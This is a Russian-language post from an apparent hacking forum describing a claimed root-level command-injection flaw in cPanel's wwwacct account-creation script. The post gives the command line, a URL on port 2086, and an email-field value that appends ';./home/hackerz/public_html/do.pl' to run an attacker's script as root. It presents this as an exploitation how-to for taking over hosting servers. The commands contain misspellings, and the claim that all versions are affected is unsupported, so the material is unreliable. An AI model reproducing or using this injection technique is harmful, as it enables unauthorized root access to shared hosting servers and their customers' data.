Перейти к содержимому



Фотография

Уязвимости cPanel

Автор errnick, 17 июн 2022 18:55

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 errnick

errnick

    дух

  • Пользователи
  • Pip
  • 4 сообщений

Отправлено 17 Июнь 2022 - 18:55

Уязвимости CPanel

 

Version : ALL !!
Risk : Very high
 
Что вы можете сделать с этой ошибкой:
у вас может быть доступ ко всем серверам с правами реселлера (Th3 r00t)
как это работает?
когда вы хотите создать учетную запись в оболочке, что произойдет?

./script/wwwact [domainname] [username] [password] [Email address] lab lab lab

вы можете запустить его с правами веб-сервера! ( cpanel : doamin:2086)
привем :

http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab

значит у вас есть доступ к wwwacct в папке со скриптами (Th3 r00t)
так что вы можете запустить другую команду с root-доступом, как это

./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl

( ваша команда ./home/hackerz/public_html/do.pl)

вы можете также запустить его в базовой веб-программе. что вам нужно сделать, это просто написать ali@hackerz.ir;./home/hackerz/public_html/do.pl в поле Email когда вы создаете аккаунт.


Обратно в Делимся опытом.

Яндекс.Метрика Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal

  1. ФОРУМ ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ И ПРОГРАММИСТОВ xakerkey.ru
  2. Общение.
  3. Делимся опытом.
  4. Политика Конфиденциальности Сайта Хакеров.
  5. Правила и информация форума хакеров xakerkey.ru ·